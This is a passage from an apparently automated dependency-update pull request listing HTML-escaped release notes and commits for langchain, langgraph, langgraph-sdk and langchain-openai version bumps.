(\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38001\"\u003e#38001\u003c/a\u003e)\nfix(langchain): preserve summarization trigger compatibility (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38000\"\u003e#38000\u003c/a\u003e)\u003c/p\u003e\n\u003ch2\u003elangchain==1.3.5\u003c/h2\u003e\n\u003cp\u003eChanges since langchain==1.3.4\u003c/p\u003e\n\u003cp\u003erelease(langchain): 1.3.5 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37998\"\u003e#37998\u003c/a\u003e)\nfeat(langchain): port AND-capable trigger conditions to \u003ccode\u003eSummarizationMiddleware\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/34576\"\u003e#34576\u003c/a\u003e)\nhotfix(openai): min core dep (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37990\"\u003e#37990\u003c/a\u003e)\nfeat(openai): support \u003ccode\u003eapply_patch\u003c/code\u003e built-in tool (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37157\"\u003e#37157\u003c/a\u003e)\nchore: bump pyarrow from 21.0.0 to 23.0.1 in /libs/langchain_v1 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37930\"\u003e#37930\u003c/a\u003e)\nchore: bump dependencies  (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37892\"\u003e#37892\u003c/a\u003e)\nchore: bump aiohttp from 3.13.4 to 3.14.0 in /libs/langchain_v1 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37888\"\u003e#37888\u003c/a\u003e)\u003c/p\u003e\n\u003ch2\u003elangchain==1.3.4\u003c/h2\u003e\n\u003cp\u003eChanges since langchain==1.3.3\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/3bfb6a33e788aaca1626a7c09cbdbdbef6977012\"\u003e\u003ccode\u003e3bfb6a3\u003c/code\u003e\u003c/a\u003e release(langchain): 1.3.9 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38104\"\u003e#38104\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/dcaf7795a3e6590af55c3ff7bda6add6355e9ea6\"\u003e\u003ccode\u003edcaf779\u003c/code\u003e\u003c/a\u003e fix(langchain,anthropic): confine file-search results and tighten anthropic `...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/0392b6bae4bdfc0b7ed5aeb2e9e414bbb7ea643b\"\u003e\u003ccode\u003e0392b6b\u003c/code\u003e\u003c/a\u003e fix(core): fix Pydantic v1 support in tools/runnable (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/33698\"\u003e#33698\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/f6d63bc9f344b2949e91a6904d301553376b4f10\"\u003e\u003ccode\u003ef6d63bc\u003c/code\u003e\u003c/a\u003e release(langchain): 1.3.8 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38096\"\u003e#38096\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/5d20596d73789020f53c622b22c0a9893ba09606\"\u003e\u003ccode\u003e5d20596\u003c/code\u003e\u003c/a\u003e style(core,langchain,langchain-classic,partners): replace double backticks in...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/fb55c6660a2ac26038a64dac1534048294bc51ab\"\u003e\u003ccode\u003efb55c66\u003c/code\u003e\u003c/a\u003e chore: bump langsmith from 0.8.9 to 0.8.14 in /libs/partners/huggingface (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38\"\u003e#38\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/51daae5c139712f6f1347b5a801f672680ba1eba\"\u003e\u003ccode\u003e51daae5\u003c/code\u003e\u003c/a\u003e chore: bump langsmith from 0.8.9 to 0.8.14 in /libs/partners/chroma (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38092\"\u003e#38092\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/70e9579e433043321fb8e93a8a51770c946363d0\"\u003e\u003ccode\u003e70e9579\u003c/code\u003e\u003c/a\u003e chore: bump langsmith from 0.8.9 to 0.8.14 in /libs/partners/fireworks (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38093\"\u003e#38093\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/6c0e9af3246e3bbf98838e4b9ec563ad563dd748\"\u003e\u003ccode\u003e6c0e9af\u003c/code\u003e\u003c/a\u003e chore: bump langsmith from 0.8.9 to 0.8.14 in /libs/partners/xai (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38094\"\u003e#38094\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/222dc846e0e965a0d6764d772226590eec14b917\"\u003e\u003ccode\u003e222dc84\u003c/code\u003e\u003c/a\u003e ci(infra): clarify early PR auto-close guidance (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38090\"\u003e#38090\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/langchain-ai/langchain/compare/langchain==1.3.1...langchain==1.3.9\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `langgraph` from 1.2.0 to 1.2.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/langchain-ai/langgraph/releases\"\u003elanggraph's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003elanggraph==1.2.5\u003c/h2\u003e\n\u003cp\u003eChanges since 1.2.4\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erelease(langgraph): 1.2.5 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8062\"\u003e#8062\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(langgraph): merge \u003ccode\u003elc_versions\u003c/code\u003e config metadata (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8052\"\u003e#8052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erelease(cli): 0.4.28 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8041\"\u003e#8041\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix: updateState bug for deltaChannel on empty thread (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8011\"\u003e#8011\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore: migrate Python type checking to ty (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8002\"\u003e#8002\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump types-requests from 2.33.0.20260408 to 2.33.0.20260518 in /libs/langgraph (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7977\"\u003e#7977\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore(deps): bump the minor-and-patch group in /libs/langgraph with 14 updates (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7975\"\u003e#7975\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003elanggraph==1.2.4\u003c/h2\u003e\n\u003cp\u003eChanges since 1.2.3\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erelease(langgraph): 1.2.4 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7991\"\u003e#7991\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etest(sdk-py): add factory-graph integration test exercising the server factory path (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7978\"\u003e#7978\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(langgraph): keep _on_started backward-compatible with overrides predating cause (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7987\"\u003e#7987\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003elanggraph==1.2.3\u003c/h2\u003e\n\u003cp\u003eChanges since 1.2.2\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erelease(langgraph): 1.2.3 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7945\"\u003e#7945\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(langgraph): wire RemoteGraph.interleave to sdk-py interleave_projections (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7938\"\u003e#7938\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(langgraph): add v3 streaming support to RemoteGraph (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7927\"\u003e#7927\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(langgraph): name tool-dispatched subagents via lc_agent_name (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7928\"\u003e#7928\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(langgraph): rename ProtocolEvent.eventId to event_id to match the wire field (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7942\"\u003e#7942\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(langgraph): merge instead of overwrite in ensure_config for callbacks, tags, metadata, configurable (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7926\"\u003e#7926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(langgraph): [LSD-1507] Distinguish between user cancelled and other cancellations (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7920\"\u003e#7920\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(cli): bump api bound to 0.10.0 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7922\"\u003e#7922\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add websocket stream transports (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7830\"\u003e#7830\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add messages and tool call projections (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7823\"\u003e#7823\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add v3 streaming primitives and SSE transport (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7818\"\u003e#7818\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003elanggraph==1.2.2\u003c/h2\u003e\n\u003cp\u003eChanges since 1.2.1\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003echore(langgraph): bump version to 1.2.2 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7914\"\u003e#7914\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(langgraph): assign stable IDs to id=None BaseMessages before DeltaChannel checkpoint writes (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7913\"\u003e#7913\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erelease(checkpoint): 4.1.1 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7890\"\u003e#7890\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003elanggraph==1.2.1\u003c/h2\u003e\n\u003cp\u003eChanges since 1.2.0\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erelease(langgraph): 1.2.1 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7883\"\u003e#7883\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(langgraph): add \u003ccode\u003ebefore_builtins\u003c/code\u003e opt-in for stream transformers (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7882\"\u003e#7882\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore(deps): bump idna from 3.11 to 3.15 in /libs/langgraph (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7866\"\u003e#7866\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(langgraph): keep tool results out of v3 messages (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7838\"\u003e#7838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore(deps): bump langsmith from 0.7.31 to 0.8.0 in /libs/langgraph (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7788\"\u003e#7788\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/7ab79f9f3e94fb4357334d902f5fd69ec0088eb4\"\u003e\u003ccode\u003e7ab79f9\u003c/code\u003e\u003c/a\u003e release(langgraph): 1.2.5 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8062\"\u003e#8062\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/385033fd9cfc356a0ed9028bef53f5490e9c0939\"\u003e\u003ccode\u003e385033f\u003c/code\u003e\u003c/a\u003e fix(langgraph): merge \u003ccode\u003elc_versions\u003c/code\u003e config metadata (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8052\"\u003e#8052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/93307d6a427d7f15bcba3264f3774d07af7d7dca\"\u003e\u003ccode\u003e93307d6\u003c/code\u003e\u003c/a\u003e release(cli): 0.4.29 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8046\"\u003e#8046\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/e05ba2965db5373c14ada7ddb3740d9b59a28206\"\u003e\u003ccode\u003ee05ba29\u003c/code\u003e\u003c/a\u003e feat(cli): add support for passing certfile and cert key to run dev server un...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/f0e814796be5e4a27f58a6979064ba35fb39bcf1\"\u003e\u003ccode\u003ef0e8147\u003c/code\u003e\u003c/a\u003e release(cli): 0.4.28 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8041\"\u003e#8041\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/d57a74f950b87bfb9cb51240cc8dccf34b5edfaa\"\u003e\u003ccode\u003ed57a74f\u003c/code\u003e\u003c/a\u003e fix: updateState bug for deltaChannel on empty thread (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8011\"\u003e#8011\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/6f83cc9dc2a24c7884ae7da20c9f39f469be35d7\"\u003e\u003ccode\u003e6f83cc9\u003c/code\u003e\u003c/a\u003e chore(deps): bump starlette from 1.0.0 to 1.0.1 in /libs/cli (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8005\"\u003e#8005\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/2ae62c6f870660deb620d7008035f9c4848bfc58\"\u003e\u003ccode\u003e2ae62c6\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump starlette from 1.0.0 to 1.0.1 in /libs/sdk-py (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8006\"\u003e#8006\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/2b1abc807b282245211f5ba8f292aaf3e24f1e07\"\u003e\u003ccode\u003e2b1abc8\u003c/code\u003e\u003c/a\u003e chore: migrate Python type checking to ty (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8002\"\u003e#8002\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/43682f0830f312822f18206dfa18c599becbff38\"\u003e\u003ccode\u003e43682f0\u003c/code\u003e\u003c/a\u003e chore(deps): bump the minor-and-patch group in /libs/cli with 4 updates (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7962\"\u003e#7962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/langchain-ai/langgraph/compare/1.2.0...1.2.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `langgraph-sdk` from 0.3.14 to 0.4.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/langchain-ai/langgraph/releases\"\u003elanggraph-sdk's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003elanggraph-sdk==0.4.2\u003c/h2\u003e\n\u003cp\u003eChanges since sdk==0.4.1\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erelease(sdk-py): 0.4.2 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7955\"\u003e#7955\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(sdk-py): percent-encode thread_id in v3 stream transport default paths (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7954\"\u003e#7954\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003elanggraph-sdk==0.4.1\u003c/h2\u003e\n\u003cp\u003eChanges since sdk==0.4.0\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erelease(sdk-py): 0.4.1 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7944\"\u003e#7944\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): extract stream decoders and add interleave_projections (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7935\"\u003e#7935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(langgraph): add v3 streaming support to RemoteGraph (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7927\"\u003e#7927\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(sdk-py): make \u003ccode\u003etools_agent\u003c/code\u003e fake model stateless (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7930\"\u003e#7930\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003elanggraph-sdk==0.4.0\u003c/h2\u003e\n\u003cp\u003eChanges since sdk==0.3.15\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erelease(sdk-py): 0.4.0 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7923\"\u003e#7923\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add thread stream helpers (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7833\"\u003e#7833\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): wire websocket stream selection (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7832\"\u003e#7832\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add websocket stream transports (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7830\"\u003e#7830\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): harden streaming reconnects (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7829\"\u003e#7829\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add sync scoped subgraphs (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7828\"\u003e#7828\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add sync messages and tool calls (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7827\"\u003e#7827\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add sync thread stream core (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7826\"\u003e#7826\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add async stream reconnect support (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7825\"\u003e#7825\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add scoped subgraph handles (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7824\"\u003e#7824\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add messages and tool call projections (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7823\"\u003e#7823\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add output, values, and controller extraction (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7822\"\u003e#7822\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): wire lifecycle state and output prerequisites (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7821\"\u003e#7821\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add shared stream subscriptions (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7820\"\u003e#7820\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add async thread stream skeleton (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7819\"\u003e#7819\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add v3 streaming primitives and SSE transport (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7818\"\u003e#7818\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore(langgraph): bump version to 1.2.2 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7914\"\u003e#7914\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003elanggraph-sdk==0.3.15\u003c/h2\u003e\n\u003cp\u003eChanges since sdk==0.3.14\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erelease(checkpoint): 4.1.1 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7890\"\u003e#7890\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erelease(sdk-py): 0.3.15 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7891\"\u003e#7891\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(sdk-py): percent-encode caller-supplied identifiers in URL paths (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7893\"\u003e#7893\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erelease(langgraph): 1.2.1 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7883\"\u003e#7883\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore(deps): bump idna from 3.11 to 3.15 in /libs/sdk-py (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7863\"\u003e#7863\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore(deps): bump urllib3 from 2.6.3 to 2.7.0 in /libs/sdk-py (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7764\"\u003e#7764\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore(deps): bump langsmith from 0.7.31 to 0.8.0 in /libs/sdk-py (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7789\"\u003e#7789\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erelease: bump alpha packages to official versions (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7775\"\u003e#7775\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore(langgraph): bump langchain-core to 1.4.0 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7767\"\u003e#7767\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): support metadata filter for crons search/count (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7737\"\u003e#7737\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore(deps): bump ty from 0.0.23 to 0.0.33 in /libs/sdk-py (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7666\"\u003e#7666\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/4aeaffef4e0d14de09fa4e34636372cb01992c6a\"\u003e\u003ccode\u003e4aeaffe\u003c/code\u003e\u003c/a\u003e 0.4.2 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/4570\"\u003e#4570\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/f1bfd6051a7a3e840c3a9ddc437a2e7f14dd41c8\"\u003e\u003ccode\u003ef1bfd60\u003c/code\u003e\u003c/a\u003e update\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/998be75f3430d87f5fa361c790b41ae8314fc64e\"\u003e\u003ccode\u003e998be75\u003c/code\u003e\u003c/a\u003e langgraph: decouple name from assistant ID in RemoteGraph\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/365dd5f459e2bd9f4fcf38805837fc8cf9356869\"\u003e\u003ccode\u003e365dd5f\u003c/code\u003e\u003c/a\u003e sdk-py: Prefix private functions in sdk with _\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/0e61cc2cf6100e0e053614bc2c5dcdeec04b07a8\"\u003e\u003ccode\u003e0e61cc2\u003c/code\u003e\u003c/a\u003e prebuilt: remove state_modifier (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/4439\"\u003e#4439\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/a0a302dec50af869c07851210f3a9dd77200e8a0\"\u003e\u003ccode\u003ea0a302d\u003c/code\u003e\u003c/a\u003e prebuilt: switch to executing parallel tool calls via Send by default (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/4438\"\u003e#4438\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/4e05db85374a652c8ddfa26b9adb9ff638fce581\"\u003e\u003ccode\u003e4e05db8\u003c/code\u003e\u003c/a\u003e Release checkpoint-sqlite (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/4509\"\u003e#4509\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/d6e20e6d093a4fe53cb04afa5af8a5b3d3b8ef31\"\u003e\u003ccode\u003ed6e20e6\u003c/code\u003e\u003c/a\u003e Add missing 'running' RunStatus (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/4508\"\u003e#4508\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/fcd06acd3365aa2c7ba5091349a6f850aedd09c4\"\u003e\u003ccode\u003efcd06ac\u003c/code\u003e\u003c/a\u003e Add support for specifying a custom base image in docker commands (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/4500\"\u003e#4500\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/94994a8d995596c1a3c035572062987c71811d83\"\u003e\u003ccode\u003e94994a8\u003c/code\u003e\u003c/a\u003e meaningless commit to get vercel going sigh\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/langchain-ai/langgraph/compare/0.3.14...0.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `langchain-openai` from 1.2.1 to 1.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/langchain-ai/langchain/releases\"\u003elangchain-openai's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003elangchain-openai==1.3.2\u003c/h2\u003e\n\u003cp\u003eChanges since langchain-openai==1.3.1\u003c/p\u003e\n\u003cp\u003erelease(openai): 1.3.2 (\u003ca 